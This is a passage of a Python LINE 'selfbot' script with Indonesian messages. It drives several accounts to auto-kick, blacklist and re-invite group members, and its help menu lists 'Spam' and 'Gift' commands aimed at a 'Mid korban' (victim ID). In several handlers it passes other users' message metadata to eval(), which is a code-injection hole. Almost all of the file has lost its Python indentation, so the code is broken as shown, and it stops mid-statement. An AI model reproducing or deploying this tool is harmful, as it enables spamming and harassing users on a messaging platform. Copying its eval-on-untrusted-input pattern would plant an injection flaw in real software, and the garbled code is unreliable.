    menu_cmds = (
        "Cek sider",
        "Cek spam",
        "Cek pesan ",
        "Cek respon ",
        "Cek welcome",
        "Set sider:「Text」",
        "Set spam:「Text」",
        "Set pesan:「Text」",
        "Set respon:「Text」",
        "Set welcome:「Text」",
        "Myname:「Nama」",
        "Bot1name:「Nama」",
        "Bot2name:「Nama」",
        "Bot3name:「Nama」",
        "Bot1up「Kirim fotonya」",
        "Bot2up「Kirim fotonya」",
        "Bot3up「Kirim fotonya」",
        "Gift:「Mid korban」「Jumlah」",
        "Spam:「Mid korban」「Jumlah」",
    )
    parts = ["™[ Selfbot Blacklist ]™\n Jangan gunakan「 " + key + " 」di depannya\n\n"]
    parts.extend("™↔ " + key + cmd + "\n" for cmd in blacklist_cmds)
    parts.append("\n™[ Selfbot Menu ]™\n Gunakan「 " + key + " 」di depannya\n\n")
    parts.extend("™↔ " + key + cmd + "\n" for cmd in menu_cmds)
    parts.append("\nKetik「 Refresh 」jika sudah\nmenggunakan command\n")
    return "".join(parts)
def bot(op):
global time
global ast
global groupParam
try:
if op.type == 0:
return
if op.type == 11:
if op.param1 in protectqr:
try:
if cl.getGroup(op.param1).preventedJoinByTicket == False:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
cl.reissueGroupTicket(op.param1)
X = cl.getGroup(op.param1)
X.preventedJoinByTicket = True
cl.updateGroup(X)
cl.sendMessage(op.param1, None, contentMetadata={'mid': op.param2}, contentType=13)
except:
try:
if ki.getGroup(op.param1).preventedJoinByTicket == False:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
ki.reissueGroupTicket(op.param1)
X = ki.getGroup(op.param1)
X.preventedJoinByTicket = True
ki.updateGroup(X)
cl.sendMessage(op.param1, None, contentMetadata={'mid': op.param2}, contentType=13)
except:
try:
if kk.getGroup(op.param1).preventedJoinByTicket == False:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
kk.reissueGroupTicket(op.param1)
X = kk.getGroup(op.param1)
X.preventedJoinByTicket = True
kk.updateGroup(X)
cl.sendMessage(op.param1, None, contentMetadata={'mid': op.param2}, contentType=13)
except:
try:
if kc.getGroup(op.param1).preventedJoinByTicket == False:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
kc.reissueGroupTicket(op.param1)
X = kc.getGroup(op.param1)
X.preventedJoinByTicket = True
kc.updateGroup(X)
cl.sendMessage(op.param1, None, contentMetadata={'mid': op.param2}, contentType=13)
except:
try:
if cl.getGroup(op.param1).preventedJoinByTicket == False:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
cl.reissueGroupTicket(op.param1)
X = cl.getGroup(op.param1)
X.preventedJoinByTicket = True
cl.updateGroup(X)
cl.sendMessage(op.param1, None, contentMetadata={'mid': op.param2}, contentType=13)
except:
try:
if ki.getGroup(op.param1).preventedJoinByTicket == False:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
ki.reissueGroupTicket(op.param1)
X = ki.getGroup(op.param1)
X.preventedJoinByTicket = True
ki.updateGroup(X)
cl.sendMessage(op.param1, None, contentMetadata={'mid': op.param2}, contentType=13)
except:
pass
if op.type == 13:
if mid in op.param3:
if wait["autoLeave"] == True:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
cl.acceptGroupInvitation(op.param1)
ginfo = cl.getGroup(op.param1)
cl.sendMessage(op.param1,"See you next time... 🙏\n Group " +str(ginfo.name))
cl.leaveGroup(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
ginfo = cl.getGroup(op.param1)
cl.sendMessage(op.param1,"Hello all fams..😜" + str(ginfo.name))
if op.type == 13:
if mid in op.param3:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
elif wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
Inviter = op.param3.replace("",',')
InviterX = Inviter.split(",")
matched_list = []
for tag in wait["blacklist"]:
matched_list+=[str for str in InviterX if str == tag]
if matched_list == []:
pass
else:
cl.cancelGroupInvitation(op.param1, matched_list)
#____________________________________________________________________
if Amid in op.param3:
if wait["autoJoin"] == True:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
ki.acceptGroupInvitation(op.param1)
ginfo = ki.getGroup(op.param1)
ki.sendMessage(op.param1,"See you nex time...🙏\n Group " +str(ginfo.name))
ki.leaveGroup(op.param1)
else:
ki.acceptGroupInvitation(op.param1)
ginfo = ki.getGroup(op.param1)
ki.sendMessage(op.param1,"Hello all fams..😃" + str(ginfo.name))
if Bmid in op.param3:
if wait["autoJoin"] == True:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
kk.acceptGroupInvitation(op.param1)
ginfo = kk.getGroup(op.param1)
ki.sendMessage(op.param1,"See you next time... 🙏\n Group " +str(ginfo.name))
kk.leaveGroup(op.param1)
else:
kk.acceptGroupInvitation(op.param1)
ginfo = kk.getGroup(op.param1)
kk.sendMessage(op.param1,"Hello all fams.. 😀" + str(ginfo.name))
if Cmid in op.param3:
if wait["autoJoin"] == True:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
kc.acceptGroupInvitation(op.param1)
ginfo = kc.getGroup(op.param1)
kc.sendMessage(op.param1,"See you next time... 🙏\n Group " +str(ginfo.name))
kc.leaveGroup(op.param1)
else:
kc.acceptGroupInvitation(op.param1)
ginfo = kc.getGroup(op.param1)
kc.sendMessage(op.param1,"Hello all fams.. 🐥" + str(ginfo.name))
if op.type == 13:
if op.param1 in protectinvite:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
try:
group = cl.getGroup(op.param1)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
cl.cancelGroupInvitation(op.param1,[_mid])
except:
try:
group = ki.getGroup(op.param1)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
ki.cancelGroupInvitation(op.param1,[_mid])
except:
try:
group = kk.getGroup(op.param1)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
kk.cancelGroupInvitation(op.param1,[_mid])
except:
try:
group = kc.getGroup(op.param1)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
kc.cancelGroupInvitation(op.param1,[_mid])
except:
pass
if op.type == 17:
if op.param2 in wait["blacklist"]:
random.choice(ABC).kickoutFromGroup(op.param1,[op.param2])
else:
pass
if op.type == 17:
if op.param1 in welcome:
if op.param2 in Bots:
pass
ginfo = cl.getGroup(op.param1)
contact = cl.getContact(op.param2).picturePath
image = 'http://dl.profile.line.naver.jp'+contact
welcomeMembers(op.param1, [op.param2])
cl.sendImageWithURL(op.param1, image)
if op.type == 17:
if op.param1 in protectjoin:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
wait["blacklist"][op.param2] = True
try:
if op.param3 not in wait["blacklist"]:
kc.kickoutFromGroup(op.param1,[op.param2])
except:
try:
if op.param3 not in wait["blacklist"]:
ki.kickoutFromGroup(op.param1,[op.param2])
except:
try:
if op.param3 not in wait["blacklist"]:
kk.kickoutFromGroup(op.param1,[op.param2])
except:
try:
if op.param3 not in wait["blacklist"]:
cl.kickoutFromGroup(op.param1,[op.param2])
except:
pass
return
if op.type == 0:
return
if op.type == 5:
if wait["autoAdd"] == True:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
if (wait["message"] in [" "," ","\n",None]):
pass
else:
cl.sendText(op.param1, wait["message"])
if op.type == 19:
if op.param1 in protectkick:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
wait["blacklist"][op.param2] = True
random.choice(ABC).kickoutFromGroup(op.param1,[op.param2])
else:
pass
if op.type == 32:
if op.param1 in protectcancel:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
wait["blacklist"][op.param2] = True
try:
if op.param3 not in wait["blacklist"]:
ki.kickoutFromGroup(op.param1,[op.param2])
except:
try:
if op.param3 not in wait["blacklist"]:
kk.kickoutFromGroup(op.param1,[op.param2])
except:
try:
if op.param3 not in wait["blacklist"]:
kc.kickoutFromGroup(op.param1,[op.param2])
except:
try:
if op.param3 not in wait["blacklist"]:
ki.kickoutFromGroup(op.param1,[op.param2])
except:
try:
if op.param3 not in wait["blacklist"]:
kk.kickoutFromGroup(op.param1,[op.param2])
except:
try:
if op.param3 not in wait["blacklist"]:
cl.kickoutFromGroup(op.param1,[op.param2])
except:
pass
return
if op.type == 19:
if mid in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
ki.kickoutFromGroup(op.param1,[op.param2])
ki.inviteIntoGroup(op.param1,[op.param3])
cl.acceptGroupInvitation(op.param1)
except:
try:
kk.kickoutFromGroup(op.param1,[op.param2])
kk.inviteIntoGroup(op.param1,[op.param3])
cl.acceptGroupInvitation(op.param1)
except:
try:
kc.kickoutFromGroup(op.param1,[op.param2])
kc.inviteIntoGroup(op.param1,[op.param3])
cl.acceptGroupInvitation(op.param1)
except:
try:
G = ki.getGroup(op.param1)
G.preventedJoinByTicket = False
ki.kickoutFromGroup(op.param1,[op.param2])
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
kc.acceptGroupInvitationByTicket(op.param1,Ticket)
G = ki.getGroup(op.param1)
G.preventedJoinByTicket = True
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
except:
try:
ki.kickoutFromGroup(op.param1,[op.param2])
ki.inviteIntoGroup(op.param1,[op.param3])
cl.acceptGroupInvitation(op.param1)
except:
try:
kk.kickoutFromGroup(op.param1,[op.param2])
kk.inviteIntoGroup(op.param1,[op.param3])
cl.acceptGroupInvitation(op.param1)
except:
pass
return
if Amid in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
kk.kickoutFromGroup(op.param1,[op.param2])
kk.inviteIntoGroup(op.param1,[op.param3])
ki.acceptGroupInvitation(op.param1)
except:
try:
kc.kickoutFromGroup(op.param1,[op.param2])
kc.inviteIntoGroup(op.param1,[op.param3])
ki.acceptGroupInvitation(op.param1)
except:
try:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.inviteIntoGroup(op.param1,[op.param3])
ki.acceptGroupInvitation(op.param1)
except:
try:
G = kk.getGroup(op.param1)
G.preventedJoinByTicket = False
kk.kickoutFromGroup(op.param1,[op.param2])
kk.updateGroup(G)
Ticket = kk.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
kc.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kk.getGroup(op.param1)
G.preventedJoinByTicket = True
kk.updateGroup(G)
Ticket = kk.reissueGroupTicket(op.param1)
except:
try:
kk.kickoutFromGroup(op.param1,[op.param2])
kk.inviteIntoGroup(op.param1,[op.param3])
ki.acceptGroupInvitation(op.param1)
except:
try:
kc.kickoutFromGroup(op.param1,[op.param2])
kc.inviteIntoGroup(op.param1,[op.param3])
ki.acceptGroupInvitation(op.param1)
except:
pass
return
if Bmid in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
kc.kickoutFromGroup(op.param1,[op.param2])
kc.inviteIntoGroup(op.param1,[op.param3])
kk.acceptGroupInvitation(op.param1)
except:
try:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.inviteIntoGroup(op.param1,[op.param3])
kk.acceptGroupInvitation(op.param1)
except:
try:
ki.kickoutFromGroup(op.param1,[op.param2])
ki.inviteIntoGroup(op.param1,[op.param3])
kk.acceptGroupInvitation(op.param1)
except:
try:
G = kc.getGroup(op.param1)
G.preventedJoinByTicket = False
kc.kickoutFromGroup(op.param1,[op.param2])
kc.updateGroup(G)
Ticket = kc.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
kc.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kc.getGroup(op.param1)
G.preventedJoinByTicket = True
kc.updateGroup(G)
Ticket = kc.reissueGroupTicket(op.param1)
except:
try:
ki.kickoutFromGroup(op.param1,[op.param2])
ki.inviteIntoGroup(op.param1,[op.param3])
kk.acceptGroupInvitation(op.param1)
except:
try:
kc.kickoutFromGroup(op.param1,[op.param2])
kc.inviteIntoGroup(op.param1,[op.param3])
kk.acceptGroupInvitation(op.param1)
except:
pass
return
if Cmid in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.inviteIntoGroup(op.param1,[op.param3])
kc.acceptGroupInvitation(op.param1)
except:
try:
ki.kickoutFromGroup(op.param1,[op.param2])
ki.inviteIntoGroup(op.param1,[op.param3])
kc.acceptGroupInvitation(op.param1)
except:
try:
kk.kickoutFromGroup(op.param1,[op.param2])
kk.inviteIntoGroup(op.param1,[op.param3])
kc.acceptGroupInvitation(op.param1)
except:
try:
G = cl.getGroup(op.param1)
G.preventedJoinByTicket = False
cl.kickoutFromGroup(op.param1,[op.param2])
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
kc.acceptGroupInvitationByTicket(op.param1,Ticket)
G = cl.getGroup(op.param1)
G.preventedJoinByTicket = True
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(op.param1)
except:
try:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.inviteIntoGroup(op.param1,[op.param3])
kc.acceptGroupInvitation(op.param1)
except:
try:
ki.kickoutFromGroup(op.param1,[op.param2])
ki.inviteIntoGroup(op.param1,[op.param3])
kc.acceptGroupInvitation(op.param1)
except:
pass
return
if admin in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.findAndAddContactsByMid(op.param1,admin)
cl.inviteIntoGroup(op.param1,admin)
except:
try:
ki.kickoutFromGroup(op.param1,[op.param2])
ki.findAndAddContactsByMid(op.param1,admin)
ki.inviteIntoGroup(op.param1,admin)
except:
try:
kk.kickoutFromGroup(op.param1,[op.param2])
kk.findAndAddContactsByMid(op.param1,admin)
kk.inviteIntoGroup(op.param1,admin)
except:
pass
return
if staff in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
ki.kickoutFromGroup(op.param1,[op.param2])
ki.findAndAddContactsByMid(op.param1,staff)
ki.inviteIntoGroup(op.param1,staff)
except:
try:
kk.kickoutFromGroup(op.param1,[op.param2])
kk.findAndAddContactsByMid(op.param1,staff)
kk.inviteIntoGroup(op.param1,staff)
except:
try:
kc.kickoutFromGroup(op.param1,[op.param2])
kc.findAndAddContactsByMid(op.param1,staff)
kc.inviteIntoGroup(op.param1,staff)
except:
pass
return
if op.type == 55:
try:
if op.param1 in Setmain["RAreadPoint"]:
if op.param2 in Setmain["RAreadMember"][op.param1]:
pass
else:
Setmain["RAreadMember"][op.param1][op.param2] = True
else:
pass
except:
pass
if op.type == 55:
if op.param2 in wait["blacklist"]:
random.choice(ABC).kickoutFromGroup(op.param1,[op.param2])
else:
pass
if cctv['cyduk'][op.param1]==True:
if op.param1 in cctv['point']:
Name = cl.getContact(op.param2).displayName
if Name in cctv['sidermem'][op.param1]:
pass
else:
cctv['sidermem'][op.param1] += "\n~ " + Name
siderMembers(op.param1, [op.param2])
if op.type == 26:
if wait["selfbot"] == True:
msg = op.message
if msg._from not in Bots:
if wait["talkban"] == True:
if msg._from in wait["Talkblacklist"]:
try:
random.choice(ABC).kickoutFromGroup(msg.to, [msg._from])
except:
try:
random.choice(ABC).kickoutFromGroup(msg.to, [msg._from])
except:
random.choice(ABC).kickoutFromGroup(msg.to, [msg._from])
if 'MENTION' in msg.contentMetadata.keys() != None:
if wait["detectMention"] == True:
name = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
for mention in mentionees:
if mention ['M'] in Bots:
cl.sendMessage(msg.to, wait["Respontag"])
cl.sendMessage(msg.to, None, contentMetadata={"STKID":"7839705","STKPKGID":"1192862","STKVER":"1"}, contentType=7)
break
if 'MENTION' in msg.contentMetadata.keys() != None:
if wait["Mentionkick"] == True:
name = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
for mention in mentionees:
if mention ['M'] in Bots:
cl.mentiontag(msg.to,[msg._from])
cl.sendMessage(msg.to, "No tag me....")
cl.kickoutFromGroup(msg.to, [msg._from])
break
if msg.contentType == 7:
if wait["sticker"] == True:
msg.contentType = 0
cl.sendMessage(msg.to,"「Cek ID Sticker」\n™↔ STKID : " + msg.contentMetadata["STKID"] + "\n™↔ STKPKGID : " + msg.contentMetadata["STKPKGID"] + "\n™↔ STKVER : " + msg.contentMetadata["STKVER"]+ "\n\n「Link Sticker」" + "\nline://shop/detail/" + msg.contentMetadata["STKPKGID"])
if msg.contentType == 13:
if wait["contact"] == True:
msg.contentType = 0
cl.sendMessage(msg.to,msg.contentMetadata["mid"])
if 'displayName' in msg.contentMetadata:
contact = cl.getContact(msg.contentMetadata["mid"])
path = cl.getContact(msg.contentMetadata["mid"]).picturePath
image = 'http://dl.profile.line.naver.jp'+path
cl.sendMessage(msg.to,"™↔ Nama : " + msg.contentMetadata["displayName"] + "\n™↔ MID : " + msg.contentMetadata["mid"] + "\n™↔ Status Msg : " + contact.statusMessage + "\n™↔ Picture URL : http://dl.profile.line-cdn.net/" + contact.pictureStatus)
cl.sendImageWithURL(msg.to, image)
if op.type == 25 or op.type == 26:
msg = op.message
text = msg.text
msg_id = msg.id
receiver = msg.to
sender = msg._from
if msg.toType == 0 or msg.toType == 2:
if msg.toType == 0:
to = receiver
elif msg.toType == 2:
to = receiver
if msg.contentType == 7:
if wait["sticker"] == True:
msg.contentType = 0
cl.sendMessage(msg.to,"STKID : " + msg.contentMetadata["STKID"] + "\nSTKPKGID : " + msg.contentMetadata["STKPKGID"] + "\nSTKVER : " + msg.contentMetadata["STKVER"]+ "\n\n「Link Sticker」" + "\nline://shop/detail/" + msg.contentMetadata["STKPKGID"])
if msg.contentType == 13:
if wait["contact"] == True:
msg.contentType = 0
cl.sendMessage(msg.to,msg.contentMetadata["mid"])
if 'displayName' in msg.contentMetadata:
contact = cl.getContact(msg.contentMetadata["mid"])
path = cl.getContact(msg.contentMetadata["mid"]).picturePath
image = 'http://dl.profile.line.naver.jp'+path
cl.sendMessage(msg.to,"™↔ Nama : " + msg.contentMetadata["displayName"] + "\n™↔ MID : " + msg.contentMetadata["mid"] + "\n™↔ Status Msg : " + contact.statusMessage + "\n™↔ Picture URL : http://dl.profile.line-cdn.net/" + contact.pictureStatus)
cl.sendImageWithURL(msg.to, image)
#ADD Bots
if msg.contentType == 13:
if msg._from in admin:
if wait["addbots"] == True:
if msg.contentMetadata["mid"] in Bots:
cl.sendMessage(msg.to,"Contact itu sudah jadi anggota bot")
wait["addbots"] = True
else:
Bots.append(msg.contentMetadata["mid"])
wait["addbots"] = True
cl.sendMessage(msg.to,"Berhasil menambahkan ke anggota bot")
if wait["dellbots"] == True:
if msg.contentMetadata["mid"] in Bots:
Bots.remove(msg.contentMetadata["mid"])
cl.sendMessage(msg.to,"Berhasil menghapus dari anggota bot")
else:
wait["dellbots"] = True
cl.sendMessage(msg.to,"Contact itu bukan anggota bot saints")
#ADD STAFF
if msg._from in admin:
if wait["addstaff"] == True:
if msg.contentMetadata["mid"] in staff:
cl.sendMessage(msg.to,"Contact itu sudah jadi staff")
wait["addstaff"] = True
else:
staff.append(msg.contentMetadata["mid"])
wait["addstaff"] = True
cl.sendMessage(msg.to,"Berhasil menambahkan ke staff")
if wait["dellstaff"] == True:
if msg.contentMetadata["mid"] in staff:
staff.remove(msg.contentMetadata["mid"])
cl.sendMessage(msg.to,"Berhasil menghapus dari staff")
wait["dellstaff"] = True
else:
wait["dellstaff"] = True
cl.sendMessage(msg.to,"Contact itu bukan staff")
#ADD ADMIN
if msg._from in admin:
if wait["addadmin"] == True:
if msg.contentMetadata["mid"] in admin:
cl.sendMessage(msg.to,"Contact itu sudah jadi admin")
wait["addadmin"] = True
else:
admin.append(msg.contentMetadata["mid"])
wait["addadmin"] = True
cl.sendMessage(msg.to,"Berhasil menambahkan ke admin")
if wait["delladmin"] == True:
if msg.contentMetadata["mid"] in admin:
admin.remove(msg.contentMetadata["mid"])
cl.sendMessage(msg.to,"Berhasil menghapus dari admin")
else:
wait["delladmin"] = True
cl.sendMessage(msg.to,"Contact itu bukan admin")
#ADD BLACKLIST
if msg._from in admin:
if wait["wblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
cl.sendMessage(msg.to,"Contact itu sudah ada di blacklist")
wait["wblacklist"] = True
else:
wait["blacklist"][msg.contentMetadata["mid"]] = True
wait["wblacklist"] = True
cl.sendMessage(msg.to,"Berhasil menambahkan ke blacklist user")
if wait["dblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
del wait["blacklist"][msg.contentMetadata["mid"]]
cl.sendMessage(msg.to,"Berhasil menghapus dari blacklist user")
else:
wait["dblacklist"] = True
cl.sendMessage(msg.to,"Contact itu tidak ada di blacklist")
#TALKBAN
if msg._from in admin:
if wait["Talkwblacklist"] == True:
if msg.contentMetadata["mid"] in wait["Talkblacklist"]:
cl.sendMessage(msg.to,"Contact itu sudah ada di Talkban")
wait["Talkwblacklist"] = True
else:
wait["Talkblacklist"][msg.contentMetadata["mid"]] = True
wait["Talkwblacklist"] = True
cl.sendMessage(msg.to,"Berhasil menambahkan ke Talkban user")
if wait["Talkdblacklist"] == True:
if msg.contentMetadata["mid"] in wait["Talkblacklist"]:
del wait["Talkblacklist"][msg.contentMetadata["mid"]]
cl.sendMessage(msg.to,"Berhasil menghapus dari Talkban user")
else:
wait["Talkdblacklist"] = True
cl.sendMessage(msg.to,"Contact itu tidak ada di Talkban")
#UPDATE FOTO
if msg.contentType == 1:
if msg._from in admin:
if Setmain["Addimage"] == True:
msgid = msg.id
fotoo = "https://obs.line-apps.com/talk/m/download.nhn?oid="+msgid
headers = cl.Talk.Headers
r = requests.get(fotoo, headers=headers, stream=True)
if r.status_code == 200:
path = os.path.join(os.path.dirname(__file__), 'dataPhotos/%s.jpg' % Setmain["Img"])
with open(path, 'wb') as fp:
shutil.copyfileobj(r.raw, fp)
cl.sendText(msg.to, "Berhasil menambahkan gambar")
Setmain["Img"] = {}
Setmain["Addimage"] = False
if msg.toType == 2:
if msg._from in admin:
if settings["groupPicture"] == True:
path = cl.downloadObjectMsg(msg_id)
settings["groupPicture"] = False
cl.updateGroupPicture(msg.to, path)
cl.sendMessage(msg.to, "Berhasil mengubah foto group")
if msg.contentType == 1:
if msg._from in admin:
if mid in Setmain["RAfoto"]:
path = cl.downloadObjectMsg(msg_id)
del Setmain["RAfoto"][mid]
cl.updateProfilePicture(path)
cl.sendMessage(msg.to,"Foto berhasil dirubah")
if msg.contentType == 1:
if msg._from in admin:
if Amid in Setmain["RAfoto"]:
path = ki.downloadObjectMsg(msg_id)
del Setmain["RAfoto"][Amid]
ki.updateProfilePicture(path)
ki.sendMessage(msg.to,"Foto berhasil dirubah")
elif Bmid in Setmain["RAfoto"]:
path = kk.downloadObjectMsg(msg_id)
del Setmain["RAfoto"][Bmid]
kk.updateProfilePicture(path)
kk.sendMessage(msg.to,"Foto berhasil dirubah")
elif Cmid in Setmain["RAfoto"]:
path = kc.downloadObjectMsg(msg_id)
del Setmain["RAfoto"][Cmid]
kc.updateProfilePicture(path)
kc.sendMessage(msg.to,"Foto berhasil dirubah")
elif Zmid in Setmain["RAfoto"]:
path = sw.downloadObjectMsg(msg_id)
del Setmain["RAfoto"][Zmid]
sw.updateProfilePicture(path)
sw.sendMessage(msg.to,"Foto berhasil dirubah")
if msg.contentType == 1:
if msg._from in admin:
if settings["changePicture"] == True:
path1 = ki.downloadObjectMsg(msg_id)
path2 = kk.downloadObjectMsg(msg_id)
path3 = kc.downloadObjectMsg(msg_id)
settings["changePicture"] = False
ki.updateProfilePicture(path1)
ki.sendMessage(msg.to, "Berhasil mengubah foto profile bot")
kk.updateProfilePicture(path2)
kk.sendMessage(msg.to, "Berhasil mengubah foto profile bot")
kc.updateProfilePicture(path3)
kc.sendMessage(msg.to, "Berhasil mengubah foto profile bot")
if msg.contentType == 0:
if Setmain["autoRead"] == True:
cl.sendChatChecked(msg.to, msg_id)
if text is None:
return
else:
cmd = command(text)
if cmd == "help":
if wait["selfbot"] == True:
if msg._from in admin:
helpMessage = help()
cl.sendMessage(msg.to, str(helpMessage))
if cmd == "bot on":
if msg._from in admin:
wait["selfbot"] = True
cl.sendText(msg.to, "Selfbot diaktifkan")
elif cmd == "bot off":
if msg._from in admin:
wait["selfbot"] = False
cl.sendText(msg.to, "Selfbot dinonaktifkan")
elif cmd == "help2":
if wait["selfbot"] == True:
if msg._from in admin:
helpMessage1 = helpbot()
cl.sendMessage(msg.to, str(helpMessage1))
elif cmd == "status":
if wait["selfbot"] == True:
if msg._from in admin:
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
md = "™[ Protect Settings ]™\n\n"
if wait["sticker"] == True: md+="™ Sticker「on」\n"
else: md+="™ Sticker「off」\n"
if wait["contact"] == True: md+="™↔ Contact「on」\n"
else: md+="™↔ Contact「off」\n"
if wait["talkban"] == True: md+="™↔ Talkban「on」\n"
else: md+="™↔ Talkban「off」\n"
if wait["Mentionkick"] == True: md+="™↔ Notag「on」\n"
else: md+="™↔ Notag「off」\n"
if wait["detectMention"] == True: md+="™↔ Respon「on」"
else: md+="™↔ Respon「off」\n"
if wait["autoJoin"] == True: md+="™↔ Autojoin「on」\n"
else: md+="™↔ Autojoin「off」\n"
if wait["autoAdd"] == True: md+="™↔ Autoadd「on」\n"
else: md+="™↔ Autoadd「off」\n"
if msg.to in welcome: md+="™↔ Welcome「on」\n"
else: md+="™↔ Welcome「off」\n"
if wait["autoLeave"] == True: md+="™↔ Autoleave「on」\n"
else: md+="™↔ Autoleave「off」\n"
if msg.to in protectqr: md+="™↔ Protecturl「on」\n"
else: md+="™↔ Protecturl「off」\n"
if msg.to in protectjoin: md+="™↔ Protectjoin「on」\n"
else: md+="™↔ Protectjoin「off」\n"
if msg.to in protectkick: md+="™↔ Protectkick「on」\n"
else: md+="™↔ Protectkick「off」\n"
if msg.to in protectcancel: md+="™↔ Protectcancel「on」\n"
else: md+="™↔ Protectcancel「off」\n"
cl.sendMessage(msg.to, md+"\nTanggal : "+ datetime.strftime(timeNow,'%Y-%m-%d')+"\nJam [ "+ datetime.strftime(timeNow,'%H:%M:%S')+" ]")
elif cmd == "creator" or text.lower() == 'creator':
if msg._from in admin:
cl.sendText(msg.to,"Creator CxB team")
ma = ""
for i in creator:
ma = cl.getContact(i)
cl.sendMessage(msg.to, None, contentMetadata={'mid': i}, contentType=13)
elif cmd == "about" or cmd == "informasi":
if wait["selfbot"] == True:
if msg._from in admin:
sendMention(msg.to, sender, "「 Type Selfbot 」\n")
cl.sendMessage(msg.to, None, contentMetadata={'mid': mid}, contentType=13)
elif cmd == "me" or text.lower() == 'me':
if wait["selfbot"] == True:
if msg._from in admin:
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage1(msg)
elif text.lower() == "mid":
cl.sendMessage(msg.to, msg._from)
elif ("Mid " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
mi = cl.getContact(key1)
cl.sendMessage(msg.to, "Nama : "+str(mi.displayName)+"\nMID : " +key1)
cl.sendMessage(msg.to, None, contentMetadata={'mid': key1}, contentType=13)
elif ("Info " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
mi = cl.getContact(key1)
cl.sendMessage(msg.to, "™↔ Nama : "+str(mi.displayName)+"\n™↔ Mid : " +key1+"\n™↔ Status Msg"+str(mi.statusMessage))
cl.sendMessage(msg.to, None, contentMetadata={'mid': key1}, contentType=13)
if "videoProfile='{" in str(cl.getContact(key1)):
